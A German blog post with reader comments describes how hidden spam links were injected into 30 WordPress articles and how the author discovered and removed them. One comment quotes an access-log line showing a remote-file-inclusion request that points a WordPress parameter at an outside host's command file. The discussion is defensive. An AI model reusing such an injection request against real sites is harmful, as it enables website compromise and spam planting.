In einem Weblog, dass sich im Laufe der Zeit auf rund 800 Besucher am Tag heraufgearbeitet hatte, fiel mir beim Blick auf die Referrer-Statistik eine wenig erwartet Suchwortkombination auf. Wieso sollte jemand mit „free arab porn“ in meinem Weblog fündig werden, und warum gab es noch Dutzende weiterer solcher dubioser Wortkombinationen in der Statistik.
Eine Suche in Google nach der seltsamen Kombination listete mein Weblog damals irgendwo in den vorderen Positionen. Auch wurden die Keywörter in den SERPs in Fettschrift deutlich hervorgehoben. Nur seltsam, dass ich bei Klick auf den Link und Begutachten des Textes keinen der drei Begriffe überhaupt entdecken konnte.
Ihr könnt euch jetzt sicher schon denken, was Sache war. Irgendso ein vermaledeiter Spammer, Spinner, Idiot Scherzbold hatte es fertig gebracht mir einen Hidden Layer mit seinen Spammer-Links unterzujubeln. Und das nicht nur einmal, gleich 30-mal hatte er zugeschlagen.
Die ganze Palette an Keywords, die man so von Spammern her kennt, von cialis über drugs, mortgage, poker, porn und so weiter, wurde genüsslich in Fünfziger-Linkpaketen auf die Blogartikel verteilt. Das Hintertückische daran, nicht in den Kommentaren, sondern im Hidden Layer versteckt am Ende der Blog-Artikel, wurden mir die Links untergeschoben. Zum Beseitigen des Spams durfte ich zu allem Überfluss dann durch alle 30 Artikel huschen und den Müll händisch raus editieren.
Und die Moral von der Geschicht? Immer brav die Statistiken überprüfen, dann kann einem kein Spammer so leicht etwas unterjubeln. War’s das also? Nicht ganz, mich hat diese Säuberungsaktion am Ende 300 Besucher am Tag gekostet, wie ich dann in der Folgewoche beim Prüfen meiner Statistiken feststellen durfte ;-)
Ich stell mich mal blöd und frage, wie er die hidden layer bei dir untergebracht hat. Wordpress hack?
ich gehe davon aus. wie genau das abgelaufen ist, weiss ich leider bis heute nicht. wird wohl so nen xss-hack gewesen sein. vielleicht weiss jemand mehr zum thema?
Naja, wenn ich meine access Logs bei meinem Blog schaue und sowas in der Art häufiger sehe:
GET /2007/05/05/wp-pass.php?_wp_http_referer=http://lifechangerscc.com//catalog/download/cmd.txt?
Dann wird es vermutlich sowas gewesen sein.
Na die 300 Besucher dürften ja jetzt wiederkommen, wo Du die Begriffe wieder im Artikel hast.. Gute Arbeit, es muss schliesslich um jeden Besucher gekämpft werden.
jo, würd mich au ma interessieren wie es technisch machbar ist nen hidden layer einzuschmuggeln.
vorallem, WTF!? wer sucht bitte nach „arab porn“!? und noch viel schlimmer, was sind das für bilder die unter diese suchbegriffe fallen!?
Jens, laut Overure sind es 5000 Leute im Monat +diverse Kombinationen wie free, gay, usw.
Na den nächsten Drecks Porn Traffic abgreifen, langsam wirds ein bisschen ville hier. Schade eigentlich …
@mafu – wieder im artikel ist gut. ging aber um ein ganz anderes blog.
@kalli – wenn ich den traffic wirklich abgreifen wollte, dann wären da die keywörter aber ganz anders im text verwurstet worden. sicherheitshalber habe ich aber noch etwas entschärft. ich erwarte hier keine dollen besucherströme via google, ich kann ja mal die analytics statistiken für diesen beitrag in ein paar wochen veröffentlichen, dann sehen wir ja was gelaufen ist. und werbung schalte ich in diesem beitrag auch nicht.
okay jetzt siehts schon besser aus ;-)
:) bin ich ja beruhigt. die stats schauen wir uns aber dennoch an. ist ja nicht uninteressant zu sehen, wie bzw ob sich schon so ein paar dezente keys auswirken können.
@ Lim_Dul – ich werde mal meine logs darauf hin durchchecken, ich denke auch dass es etwas in der art sein dürfte.
Jens: Wordpress hatte in den letzten Versionen die ein oder andere Sicherheitslücke.
Konsequenz war, dass man (wie in dem Logauszug oben gezeigt) Parameter übergeben konnte, die Wordpress nicht sauber validiert hat. Ergebnis ist, dass man so beispielsweise php-code einschmuggeln konnte. Und sobald man einmal php code auf einem fremden Blog ausführen kann, ist es kein Problem, mal eben das Template oder die Datenbank zu verändern.
ich denke, die 300 Besucher weniger werden nicht weh tun, da diese ja ohnehin was ANDRES gesucht haben, die armen Seelen.
ja, unterirdische verweilzeiten ;-)
Ist schon interessant wonach die Leute suchen …